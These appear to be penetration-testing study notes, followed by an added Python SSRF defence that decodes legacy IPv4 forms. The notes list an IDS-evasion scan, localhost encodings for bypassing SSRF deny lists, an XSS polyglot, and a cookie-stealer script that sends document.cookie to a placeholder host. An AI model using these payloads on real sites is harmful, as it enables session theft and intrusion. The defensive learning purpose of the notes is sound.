nmap -sN (Null scan) can be used to evade IDS
in sql, schema=database
in metasploit shells, meterpreter_reverse_shell is stageless but meterpreter/reverse_shell is staged
if it uses _ it is stageless, / is staged
Attackers can bypass a Deny List by using alternative localhost references such as 0, 0.0.0.0, 0000, 127.1, 127.*.*.*, 2130706433, 017700000001 or subdomains that have a DNS record which resolves to the IP Address 127.0.0.1 such as 127.0.0.1.nip.io.
jaVasCript:/*-/*/`/'/"/**/(/ */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e` → polyglot for XSS
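<script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie));</script> → cookie stealer: sends document.cookie, Base64-encoded, to the given host; cookies set with HttpOnly are not readable this way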
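
For the Deny List note above (alternative localhost references), an added defensive example that is not part of the original notes: instead of matching strings, decode the host the way legacy IPv4 parsers do and test the resulting address. The function names, the injectable `resolve` parameter and the set of blocked ranges are assumptions made for this sketch.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

_PART = re.compile(r"0[xX][0-9a-fA-F]+|[0-9]+")

def parse_legacy_ipv4(host):
    """Decode inet_aton-style text (1-4 parts, decimal/octal/hex) or return None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.fullmatch(p) for p in parts):
        return None
    try:
        nums = [int(p, 16) if p[:2].lower() == "0x"
                else int(p, 8) if len(p) > 1 and p[0] == "0"
                else int(p) for p in parts]
    except ValueError:          # e.g. "08" is not valid octal
        return None
    *head, last = nums
    # The final part fills all remaining bytes, so "127.1" means 127.0.0.1.
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last
    for i, n in enumerate(head):
        value += n << (8 * (3 - i))
    return ipaddress.IPv4Address(value)

def dns_lookup(host):
    """Default resolver: every address the name currently maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_internal(ip):
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)

def url_targets_internal(url, resolve=dns_lookup):
    """True if the URL's host is, or resolves to, a non-public address."""
    host = urlsplit(url).hostname
    if not host:
        return True                      # fail closed on unparsable input
    ip = parse_legacy_ipv4(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)   # IPv6 literal such as ::1
        except ValueError:
            try:
                addrs = [ipaddress.ip_address(a) for a in resolve(host)]
            except (OSError, ValueError):
                return True              # unresolved names are rejected too
            return not addrs or any(is_internal(a) for a in addrs)
    return is_internal(ip)
```

The address that passed the check must be the one the request actually connects to; if the HTTP client resolves the name again, a changed DNS answer bypasses the check.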